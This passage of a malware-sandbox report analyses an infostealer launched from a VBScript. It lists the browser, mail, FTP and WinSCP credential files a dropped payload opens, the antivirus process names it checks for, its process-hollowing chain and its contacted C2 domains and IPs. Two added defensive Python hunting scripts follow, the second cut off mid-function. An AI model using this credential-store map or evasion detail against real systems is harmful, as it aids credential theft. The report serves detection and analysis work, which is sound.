                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_02DB920C GetLocalTime,2_2_02DB920C
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_02DBB78C GetVersionExA,2_2_02DBB78C
                      Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2555442502.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 3176, type: MEMORYSTR
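The file and registry opens listed above are the raw material for a hunt. As an added example (not part of the Joe Sandbox report), the script below turns them into a detection: it maps each opened path or key to the credential store it belongs to, ignores the store's own application reading it, and flags any process that either runs from a user-writable directory or touches three or more distinct stores. The events are constructed here in a Sysmon-like shape so the check runs offline; the field names and the owner-process names assumed for FTP Navigator and IncrediMail are this example's own.

```python
"""Hunt for credential-store access by processes that should not be reading them.

Added example; not part of the Joe Sandbox report. The target paths and keys are
the ones the report lists for Native_neworigin.exe; the event records are
constructed in a Sysmon-like shape (image = process path, target = file or key)
so the check runs offline.
"""
import re

# (regex on the opened file or registry key, process images allowed to read it).
# The owner names for FTP Navigator and IncrediMail are assumptions.
CREDENTIAL_STORES = [
    (r"\\Google\\Chrome\\User Data\\.*\\(Login Data|Cookies)$", {"chrome.exe"}),
    (r"\\Microsoft\\Edge\\User Data\\.*\\(Login Data|Cookies)$", {"msedge.exe"}),
    (r"\\Mozilla\\Firefox\\(profiles\.ini|Profiles\\.*\\cookies\.sqlite)$", {"firefox.exe"}),
    (r"\\Thunderbird\\profiles\.ini$", {"thunderbird.exe"}),
    (r"\\(Cyberfox|BlackHawk)\\profiles\.ini$", {"cyberfox.exe", "blackhawk.exe"}),
    (r"^C:\\FTP Navigator\\Ftplist\.txt$", {"ftpnavigator.exe"}),
    (r"^HKEY_CURRENT_USER\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions$", {"winscp.exe"}),
    (r"\\Windows Messaging Subsystem\\Profiles$", {"outlook.exe"}),
    (r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities$", {"incmail.exe"}),
]
STORE_PATTERNS = [(re.compile(p, re.IGNORECASE), owners) for p, owners in CREDENTIAL_STORES]
# Directories a dropper lands in; a credential reader living here is already suspect.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|Downloads)\\", re.IGNORECASE)
MIN_STORES = 3  # distinct stores one process must touch before it is called a harvester


def match_store(target):
    """Return (store index, owner set) for a credential-store path or key, else None."""
    for idx, (pattern, owners) in enumerate(STORE_PATTERNS):
        if pattern.search(target):
            return idx, owners
    return None


def hunt(events):
    """Return one finding per suspicious image: which stores it read and why it was flagged."""
    touched = {}  # image -> set of store indexes it opened
    for ev in events:
        hit = match_store(ev["target"])
        if hit is None:
            continue
        idx, owners = hit
        if ev["image"].rsplit("\\", 1)[-1].lower() in owners:
            continue  # the owning application reading its own store
        touched.setdefault(ev["image"], set()).add(idx)
    findings = []
    for image, stores in touched.items():
        reasons = []
        if len(stores) >= MIN_STORES:
            reasons.append("reads %d distinct credential stores" % len(stores))
        if USER_WRITABLE.search(image):
            reasons.append("runs from a user-writable directory")
        if reasons:
            findings.append({"image": image, "stores": sorted(stores), "reasons": reasons})
    return findings


STEALER = r"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
SAMPLE_EVENTS = [  # constructed events mirroring the report's file/registry opens
    {"image": STEALER, "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"image": STEALER, "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite"},
    {"image": STEALER, "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"image": STEALER, "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": STEALER, "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"image": STEALER, "target": r"C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini"},
    {"image": STEALER, "target": r"C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini"},
    {"image": STEALER, "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"image": STEALER, "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"image": STEALER, "target": r"C:\FTP Navigator\Ftplist.txt"},
    {"image": STEALER, "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"image": STEALER, "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"},
    {"image": STEALER, "target": r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"},
    # benign controls: the browser and WinSCP reading their own stores, Explorer touching one file
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "target": r"HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"},
    {"image": r"C:\Windows\explorer.exe", "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["image"], "->", "; ".join(finding["reasons"]))
```

The per-process grouping is what separates a stealer from noise: a single browser reading its own cookie database is routine, while one image from %TEMP% sweeping browsers, mail clients, FTP clients and WinSCP in one burst is the behaviour the report's signatures describe.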

                      Remote Access Functionality

                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2555442502.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.000000000301A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 3176, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b1711e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.401c190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5850000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.Native_neworigin.exe.91e438.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4256478.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200f08.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5770000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.3ebc190.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.Native_neworigin.exe.897ac8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80f08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.Native_neworigin.exe.897ac8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a76216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.3140000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a7711e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a76216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.401c190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a9711e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4255570.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4255570.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b16216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5770000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80f08.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4256478.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a96216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a7711e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b1711e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.3140000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.42ac190.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.42ac190.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.Native_neworigin.exe.91e438.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160f08.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a9711e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.3ebc190.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160f08.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_neworigin.exe.7f6968.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a96216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b16216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_neworigin.exe.7f6968.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.2549393142.0000000002A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2572030022.0000000004255000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2555146769.0000000003140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.2364237623.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413558815.0000000005850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413068752.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2397545638.0000000002A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3563552557.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3561235753.0000000002AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3564025665.0000000005770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3563972191.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.2491911126.0000000000897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2553213718.0000000002F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic; a number preceding a technique name is the count shown in that cell of the report's matrix)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances, Gather Victim Org Information
Resource Development: 121 Scripting, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains, DNS Server
Initial Access: 1 Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain
Execution: 121 Windows Management Instrumentation, 11 Native API, 1 Shared Modules, 2 Exploitation for Client Execution, 3 Command and Scripting Interpreter, 1 Scheduled Task/Job, 2 Service Execution, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell
Persistence: 121 Scripting, 1 DLL Side-Loading, 1 Valid Accounts, 1 Windows Service, 1 Scheduled Task/Job, 21 Registry Run Keys / Startup Folder, Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Privilege Escalation: 1 DLL Side-Loading, 1 Valid Accounts, 1 Access Token Manipulation, 1 Windows Service, 311 Process Injection, 1 Scheduled Task/Job, 21 Registry Run Keys / Startup Folder, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Defense Evasion: 21 Disable or Modify Tools, 11 Deobfuscate/Decode Files or Information, 4 Obfuscated Files or Information, 1 Software Packing, 1 Timestomp, 1 DLL Side-Loading, 211 Masquerading, 1 Valid Accounts, 1 Access Token Manipulation, 151 Virtualization/Sandbox Evasion, 311 Process Injection, Embedded Payloads
Credential Access: 2 OS Credential Dumping, 21 Input Capture, 1 Credentials in Registry, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging
Discovery: 1 System Time Discovery, 1 Account Discovery, 1 System Network Connections Discovery, 3 File and Directory Discovery, 47 System Information Discovery, 1 Query Registry, 261 Security Software Discovery, 151 Virtualization/Sandbox Evasion, 2 Process Discovery, 1 Application Window Discovery, 1 System Owner/User Discovery, 1 System Network Configuration Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools, Taint Shared Content
Collection: 11 Archive Collected Data, 2 Data from Local System, 1 Email Collection, 21 Input Capture, 1 Clipboard Data, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture
Command and Control: 3 Ingress Tool Transfer, 11 Encrypted Channel, 1 Non-Standard Port, 4 Non-Application Layer Protocol, 25 Application Layer Protocol, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol, Exfiltration Over Physical Medium
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption, Resource Hijacking

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (ID 1559226): sample IBKB.vbs, start date 20/11/2024, architecture WINDOWS, score 100
Top-level network: zlenh.biz; vjaxhpbji.biz; 46 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures

Process tree (children indented under their parent; dropped files, contacted hosts and signatures listed per process):

wscript.exe
  signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
  dropped: C:\Users\user\AppData\Local\Temp\x.exe (PE32)
  x.exe
    network: gxe0.com 198.252.105.91, 443, 49704, 49705 (HAWKHOSTCA, Canada)
    dropped: C:\Users\Public\Libraries\aymtmquJ.pif (PE32); C:\Users\Public\Libraries\Juqmtmya (data); C:\Users\Public\Juqmtmya.url (MS)
    signatures: Machine Learning detection for dropped file; Drops PE files with a suspicious file extension; Writes to foreign memory regions; 3 other signatures
    aymtmquJ.pif
      dropped: C:\Users\user\AppData\...\Trading_AIBot.exe (PE32); C:\Users\user\...\Native_neworigin.exe (PE32)
      Trading_AIBot.exe
        dropped: C:\Users\user\AppData\Roaming\...\apihost.exe (PE32)
        signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules; 2 other signatures
        powershell.exe
          signatures: Loading BitLocker PowerShell Module
          conhost.exe
          WmiPrvSE.exe
        apihost.exe
          signatures: Antivirus detection for dropped file
        schtasks.exe
          conhost.exe
      Native_neworigin.exe
        network: s82.gocheapweb.com 51.195.88.199, 49771, 49926, 49953 (OVHFR, France); lpuegx.biz 82.112.184.197, 49770, 49777, 49925 (FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU, Russian Federation); 5 other IPs or domains
        signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access)
    cmd.exe
      esentutl.exe
        dropped: C:\Users\Public\alpha.pif (PE32)
        signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
      conhost.exe
    esentutl.exe
      dropped: C:\Users\Public\Libraries\Juqmtmya.PIF (PE32)
      conhost.exe
Juqmtmya.PIF
  signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique
  aymtmquJ.pif
    Native_neworigin.exe
      network: yunalwv.biz 208.100.26.245, 50019, 50028, 80 (STEADFASTUS, United States); xlfhhhm.biz 47.129.31.212, 50011, 50040, 80 (ESAMARA-ASRU, Canada); 6 other IPs or domains
      signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
    Trading_AIBot.exe
Juqmtmya.PIF
  signatures: Machine Learning detection for dropped file
  aymtmquJ.pif
    Native_neworigin.exe
      network: 172.234.222.138, 49839, 49844, 49907 (AKAMAI-ASN1EU, United States)
    Trading_AIBot.exe
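The graph's value for a defender is the lineage: a script host launching an executable from %TEMP%, that executable dropping .pif payloads under the Public profile, and esentutl.exe being used to copy cmd.exe under a new name. As an added example (not part of the Joe Sandbox report), the script below rebuilds a process tree from process-creation events and prints the full ancestry chain for every process that trips one of those rules. The events are constructed to mirror the graph; the PIDs and the esentutl.exe command line are this example's assumptions, since the report shows the dropped file but not the command line.

```python
"""Rebuild a process tree from process-creation events and flag the execution
chain the behavior graph shows: script host -> dropper in %TEMP% -> .pif
payloads under the Public profile -> esentutl.exe copying cmd.exe.

Added example; not part of the Joe Sandbox report. Events are constructed to
mirror the graph; PIDs and the esentutl.exe command line are assumptions.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(
    r"^C:\\Users\\[^\\]+\\(AppData\\Local\\Temp|Downloads)\\|^C:\\Users\\Public\\",
    re.IGNORECASE)
# "esentutl.exe /y <src> /d <dst>" copies a file without invoking copy or xcopy.
ESENTUTL_COPY = re.compile(r"/y\s+(?P<src>\S+)\s+/d\s+(?P<dst>\S+)", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(events):
    """Map pid -> (ppid, image path, command line)."""
    return {pid: (ppid, image, cmdline) for pid, ppid, image, cmdline in events}


def ancestry(tree, pid):
    """Root-to-leaf chain of image names, stopping at an unknown or cyclic parent."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        ppid, image, _ = tree[pid]
        chain.append(basename(image))
        pid = ppid
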